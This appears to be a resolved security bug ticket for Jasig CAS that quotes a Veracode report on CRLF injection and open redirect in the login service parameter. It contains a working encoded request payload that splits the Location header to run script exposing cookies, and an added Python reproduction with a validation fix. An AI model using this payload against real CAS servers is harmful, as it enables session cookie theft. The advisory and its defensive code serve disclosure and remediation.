
CAS Service Parameter is Susceptible to CRLF Attacks

    Details

    • Type: Security Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 3.4.10
    • Fix Version/s: 3.4.11
    • Component/s: Web
    • Labels:

      Description

      Vulnerability report submitted by Veracode:

      During an application assessment for one of our customers we discovered a vulnerability in Jasig/CAS. The service is prone to a CRLF injection and an open URL redirection vulnerability. The service parameter of the /cas/login servlet can be used by an attacker to execute arbitrary javascript in the user's browser within the context of the domain the CAS is running on. If CAS is configured to remember users, the CAS cookies (CASPRIVACY/CASTGC) could be stolen since the malicious javascript will be executing under the path specified by the set-cookie (in this case /cas).
      Below is a login request that was shown to cause javascript execution on a Mozilla browser through use of the CRLF injection. Note that CRLF exploitation techniques vary from browser to browser.
      The open redirect issue is easily seen by simply changing the service parameter to an arbitrary URL. Upon successful authentication the user will be redirected to this URL.
      The version that was tested was 3.3.5.

      POST /cas/login?service=http:%3A%2F%2fwww.veracode.com%0D%0ALocation:%20javascript:%0D%0A%0D%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
      Host: xxxxxxxxxxxxxxxxxx
      User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.22) Gecko/20110905 Ubuntu/10.04 (lucid) Firefox/3.6.22
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-us,en;q=0.5
      Accept-Encoding: gzip,deflate
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
      Keep-Alive: 115
      Proxy-Connection: keep-alive
      Referer: http://xxxxxxxxxxxxxxxxxx/cas/login?service=http:%3A%2F%2fwww.veracode.com%0D%0ALocation:%20javascript:%0D%0A%0D%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E
      Cookie: username=Admin; JSESSIONID=7F0FDB29748B75F2BAF5177E2E63777F
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 75

      username=Admin&password=xxxxxxxx&j_uri=&lt=e1s1&_eventId=submit&login=Sign+In

      HTTP/1.1 302 Moved Temporarily
      Date: Mon, 12 Sep 2011 21:12:01 GMT
      Server: Apache/2.2.3 (CentOS)
      Pragma: no-cache
      Expires: Thu, 01 Jan 1970 00:00:00 GMT
      Cache-Control: no-cache
      Cache-Control: no-store
      Set-Cookie: CASPRIVACY=""; Domain=xxxxxxxx.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/cas
      Set-Cookie: CASTGC=TGT-101-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; Domain=xxxxxxxxx; Path=/cas; Secure
      Location: http://xxxxxxxxxxxxxxxxx/cas/login/http:://www.veracode.com
      Location: javascript:

      <script>alert(document.cookie)</script>?ticket=ST-95-rw9qb************************
      Content-Length: 0
      Connection: close
      Content-Type: text/plain; charset=UTF-8
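      As an added example (not part of the Veracode report and not CAS project code), the following Python reproduces the header splitting the report describes using the report's own service value, and places beside it the kind of validation a defender wants in front of the redirect: reject any control character in the parameter and only redirect to an allow-listed service host. The allow-listed host, the ticket value and the function names are constructed for this illustration.

```python
"""Header-injection check for a CAS-style `service` redirect parameter.

Constructed example, not CAS code: the page's payload is reproduced to show
how an unchecked value splits the Location header, followed by a validator
that rejects control characters and enforces a service allow-list.
"""
from typing import List, Optional
from urllib.parse import unquote, urlsplit

# The service value from the report's request, as a servlet container would
# hand it to the application after percent-decoding the query string.
PAYLOAD = unquote(
    "http:%3A%2F%2fwww.veracode.com%0D%0ALocation:%20javascript:"
    "%0D%0A%0D%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E"
)

# Constructed allow-list standing in for a registry of known service URLs.
ALLOWED_SERVICE_HOSTS = {"app.example.org"}


def naive_redirect(service: str, ticket: str = "ST-1-constructed") -> bytes:
    """Vulnerable pattern: interpolate the raw service value into a header."""
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: {service}?ticket={ticket}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("utf-8")


def location_headers(response: bytes) -> List[str]:
    """Return every Location value a line-oriented client would see."""
    return [
        line.split(b":", 1)[1].strip().decode("utf-8")
        for line in response.split(b"\r\n")
        if line.startswith(b"Location:")
    ]


def validate_service(service: str) -> Optional[str]:
    """Return None if the service URL is acceptable, else the rejection reason."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in service):
        return "control character in service parameter"  # blocks CRLF splitting
    parts = urlsplit(service)
    if parts.scheme not in ("http", "https"):
        return "scheme must be http or https"  # blocks javascript: targets
    if parts.hostname not in ALLOWED_SERVICE_HOSTS:
        return "service host is not a registered service"  # blocks open redirect
    return None


def safe_redirect(service: str, ticket: str = "ST-1-constructed") -> bytes:
    """Hardened pattern: validate first, then build the same redirect."""
    reason = validate_service(service)
    if reason is not None:
        raise ValueError(reason)
    return naive_redirect(service, ticket)
```

Run against the report's payload, `naive_redirect` yields two Location headers, while `validate_service` rejects it on the control-character check before any header is built.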

            People

            • Assignee: serac (Marvin S. Addison)
            • Reporter: serac (Marvin S. Addison)